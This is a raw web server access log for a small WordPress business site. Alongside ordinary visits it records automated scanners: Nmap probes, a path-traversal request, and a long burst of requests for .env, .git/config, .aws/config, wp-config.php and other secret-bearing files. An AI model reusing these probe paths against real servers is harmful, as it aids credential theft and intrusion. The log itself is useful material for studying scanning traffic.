139.162.119.196 - - [18/Oct/2025:11:38:28 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML"
139.162.119.196 - - [18/Oct/2025:11:38:28 +0800] "GET / HTTP/1.1" 200 153674 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML"
139.162.119.196 - - [18/Oct/2025:11:38:31 +0800] "GET /owa/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML"
36.133.115.36 - - [18/Oct/2025:11:57:42 +0800] "POST /wp-cron.php?doing_wp_cron=1760759862.0349159240722656250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
113.248.49.84 - - [18/Oct/2025:11:57:42 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
113.248.49.84 - - [18/Oct/2025:11:57:42 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
113.248.49.84 - - [18/Oct/2025:11:57:44 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
113.248.49.84 - - [18/Oct/2025:11:57:44 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
113.248.49.84 - - [18/Oct/2025:11:57:44 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
113.248.49.84 - - [18/Oct/2025:11:57:44 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
113.248.49.84 - - [18/Oct/2025:11:57:45 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px-768x432.webp HTTP/1.1" 200 28786 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
113.248.49.84 - - [18/Oct/2025:11:57:45 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px-768x432.webp HTTP/1.1" 200 53850 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36"
36.133.115.36 - - [18/Oct/2025:11:59:48 +0800] "POST /wp-cron.php?doing_wp_cron=1760759988.7201309204101562500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.172.89.99 - - [18/Oct/2025:11:59:49 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
113.122.20.65 - - [18/Oct/2025:11:59:56 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.30"
182.88.140.64 - - [18/Oct/2025:12:00:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.68"
182.88.140.64 - - [18/Oct/2025:12:00:26 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.68"
36.133.115.36 - - [18/Oct/2025:12:00:59 +0800] "POST /wp-cron.php?doing_wp_cron=1760760059.5274178981781005859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.57.13.121 - - [18/Oct/2025:12:00:59 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
123.57.13.121 - - [18/Oct/2025:12:00:59 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
43.155.129.131 - - [18/Oct/2025:12:01:25 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
123.57.13.121 - - [18/Oct/2025:12:15:09 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
36.133.115.36 - - [18/Oct/2025:12:54:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760763293.6922259330749511718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.43.152.154 - - [18/Oct/2025:12:54:53 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.43.152.154 - - [18/Oct/2025:12:55:03 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.43.152.154 - - [18/Oct/2025:12:55:03 +0800] "GET /nmaplowercheck1760763302 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.152.154 - - [18/Oct/2025:12:55:03 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.152.154 - - [18/Oct/2025:12:55:04 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.152.154 - - [18/Oct/2025:12:55:04 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.152.154 - - [18/Oct/2025:12:55:23 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.43.152.154 - - [18/Oct/2025:12:55:24 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [18/Oct/2025:12:58:00 +0800] "POST /wp-cron.php?doing_wp_cron=1760763480.2544860839843750000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
104.248.187.146 - - [18/Oct/2025:12:58:00 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
104.248.187.146 - - [18/Oct/2025:12:58:01 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [18/Oct/2025:13:05:45 +0800] "POST /wp-cron.php?doing_wp_cron=1760763945.3420829772949218750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.135.57 - - [18/Oct/2025:13:05:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Oct/2025:13:05:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760763946.9406340122222900390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.135.57 - - [18/Oct/2025:13:05:47 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Oct/2025:13:12:27 +0800] "POST /wp-cron.php?doing_wp_cron=1760764347.7028760910034179687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
206.168.34.41 - - [18/Oct/2025:13:12:27 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [18/Oct/2025:13:16:24 +0800] "POST /wp-cron.php?doing_wp_cron=1760764583.9598820209503173828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
194.187.176.87 - - [18/Oct/2025:13:16:24 +0800] "GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/users/search%3fpagesize=1 HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
36.133.115.36 - - [18/Oct/2025:13:27:54 +0800] "POST /wp-cron.php?doing_wp_cron=1760765273.9997909069061279296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.106.57.131 - - [18/Oct/2025:13:27:54 +0800] "GET /manager/html HTTP/1.1" 404 8990 "-" "Mozilla/5.0 zgrab/0.x"
62.60.131.151 - - [18/Oct/2025:13:33:30 +0800] "GET / HTTP/1.1" 200 33932 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /i.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/auth.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/email.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/app.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/mail.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/application.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /php-info.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/broadcasting.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/doctypes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/app.default.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/autoload.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /secured/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/queue.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/routes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /.env.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/autoload/global.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/cache.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /app/etc/env.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /install/index.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/database.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/encryption.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/autoload/local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/mimes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/profiler.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/database.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/constants.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET / HTTP/1.1" 200 33932 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/database.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /phpinfos.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/migration.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /php.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/filesystems.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/app_local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/foreign_chars.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/view.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/services.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /app/etc/env.local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /config/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:34 +0800] "GET /application/config/hooks.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:35 +0800] "GET /config/env.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:36 +0800] "GET /phpinfo.php5 HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:36 +0800] "GET /app/etc/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:36 +0800] "GET /config/test.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:36 +0800] "GET /local/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:36 +0800] "GET /development/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:36 +0800] "GET /?pp=env&pp=env HTTP/1.1" 200 33932 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /config/module.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /private/env.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /settings.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /angular.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /launchSettings.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /app/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /test.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /config.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
36.133.115.36 - - [18/Oct/2025:13:33:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760765616.3296239376068115234375 HTTP/1.1" 499 0 "-" "WordPress/6.8.2; http://cqqizhou.com"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.docker/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /web/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.env.config HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.gitlab-ci/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /backend/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /phpinfo.php4 HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /config/development.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /application/config/constants.php/ HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /?pp=enable&pp=env HTTP/1.1" 200 33932 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.docker/laravel/app/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /test2.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /phpinfo.php3 HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /live_env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /aws.yml HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /mailer/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /config/paths.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /admin-app/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /frontend_dev.php/$ HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /crm/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.env.project HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /prod/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /Properties/launchSettings.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.vscode/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /_profiler/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /.remote HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:37 +0800] "GET /tsconfig.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:38 +0800] "GET /prevlaravel/sftp-config.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:38 +0800] "GET /.docker/config.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:38 +0800] "GET /?phpinfo=1 HTTP/1.1" 200 33467 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:38 +0800] "GET /config/cli_bootstrap.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:38 +0800] "GET /test1.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:39 +0800] "GET /apps/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:39 +0800] "GET /.env.bak HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:39 +0800] "GET /conf/application.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:39 +0800] "GET /config/test.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /appsettings.QA.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /config/staging.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /api/config/tsconfig.json HTTP/1.1" 200 81 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /.production HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /symfony/_profiler/phpinfo HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /application/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /public/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /admin/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /hosting.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:40 +0800] "GET /config/requirements.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /appsettings.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /wp-config.php HTTP/1.1" 200 31 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/security.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /app/etc/config.local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.vscode/settings.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /appsettings.Development.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/aws.yml HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /asdf.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/settings.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/bootstrap.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.env.development.local HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /dashboard/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /php_info.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /src/settings.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/session.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /infophp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /laravel/.env HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/default.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.ssh/sftp-config.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /appsettings.Local.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /env.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /dev/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /config/daemon.json HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.aws/config HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
62.60.131.151 - - [18/Oct/2025:13:33:41 +0800] "GET /.env.backup HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
